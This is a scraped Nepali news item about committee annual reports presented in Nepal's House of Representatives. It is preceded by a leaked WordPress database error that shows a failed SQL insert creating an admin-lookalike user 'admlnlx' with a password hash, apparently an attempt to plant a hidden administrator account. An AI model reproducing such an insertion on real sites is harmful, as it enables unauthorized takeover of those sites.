WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bpa9B6rU.ca3bW0CrF0bdgxVradSxl/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 15:33:37', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । प्रतिनिधिसभाको आजको बैठकमा उद्योग तथा वाणिज्य र श्रम तथा उपभोक्ता हित समितिको वार्षिक प्रतिवेदन पेस भएको छ ।
समितिका सभापति विमलप्रसाद श्रीवास्तवले सो समितिको वार्षिक प्रतिवेदन, २०७९ पेश गर्नुभएको हो ।
यस्तै बैठकमा अन्तर्राष्ट्रियसम्बन्ध समितिका सभापति पवित्रा निरौला खरेलले ‘अन्तर्राष्ट्रिय सम्बन्ध समितिको वार्षिक प्रतिवेदन, २०७९ पेस गर्नुभयो । यसैगरी राष्ट्रपति कार्यालयबाट प्राप्त विधेयक प्रमाणीकरणसम्बन्धी पत्रको व्यहोरा पढेर सुनाउनुभएको थियो । रासस